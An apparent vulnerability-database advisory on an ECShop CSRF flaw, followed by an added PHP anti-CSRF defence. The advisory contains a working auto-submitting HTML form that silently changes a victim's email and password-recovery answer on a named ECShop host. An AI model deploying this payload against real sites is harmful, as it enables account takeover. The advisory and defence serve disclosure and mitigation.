ECShop arbitrary user password modification vulnerability: CSRF exploit

2010-10-05T00:00:00
ID MYHACK58:62201028027
Type myhack58
Reporter Anonymous
Modified 2010-10-05T00:00:00

Description

ECShop's authentication mechanism has a design flaw that allows a malicious user to steal another user's password. The attack can be carried out through XSS and CSRF.

Exploit:

<html>
<body>
<!-- Profile-edit form that is auto-submitted by the script below -->
<form action="http://www.chinasg.tk/ecshop/user.php" method="POST">
<INPUT TYPE="text" NAME="email" value="cnhackerx@163.com">
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
</form>
</body>
<script>
document.forms[0].submit();
</script>
</html>
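The form above succeeds because the act_edit_profile request carries nothing an attacker's page cannot supply. The following is an added example, not ECShop code and not part of the original advisory, of a server-side check that rejects it: a per-session anti-CSRF token, plus re-entry of the current password before the e-mail or password question/answer may change (which also limits the XSS route, since a script that can read the token still lacks the password). The function names, the csrf_token and current_password fields, and the session layout are assumptions.

```php
<?php
// Added example, not ECShop code. All helper and field names below are hypothetical.

/** Issue (or reuse) a per-session anti-CSRF token to embed as a hidden form field. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Returns null when the profile edit is allowed, otherwise the reason it is rejected. */
function check_profile_edit(array $session, array $post, callable $verifyPassword): ?string
{
    // 1. The token must be present and match the session copy (constant-time compare).
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $sent)) {
        return 'missing or invalid CSRF token';
    }
    // 2. Fields that feed password recovery require the current password again,
    //    so a stolen session or injected script alone cannot change them.
    $sensitive = ['email', 'sel_question', 'passwd_answer'];
    if (array_intersect($sensitive, array_keys($post))) {
        $current = $post['current_password'] ?? '';
        if (!is_string($current) || !$verifyPassword($current)) {
            return 're-authentication required';
        }
    }
    return null;
}

// Constructed demo data: the forged request mirrors the advisory's form fields.
$session = ['user_id' => 42];
$token   = csrf_token($session);
$verify  = fn(string $p): bool => hash_equals('correct horse', $p); // stand-in for password_verify() against the stored hash

$forged = ['email' => 'attacker@example.test', 'act' => 'act_edit_profile',
           'sel_question' => 'ecshop', 'passwd_answer' => 'exploit'];
$legit  = $forged + ['csrf_token' => $token, 'current_password' => 'correct horse'];
$legit['email'] = 'owner@example.test';

var_dump(check_profile_edit($session, $forged, $verify));
var_dump(check_profile_edit($session, $legit, $verify));
```

The forged request is rejected at the token check, while the request that carries the session's token and the current password is allowed.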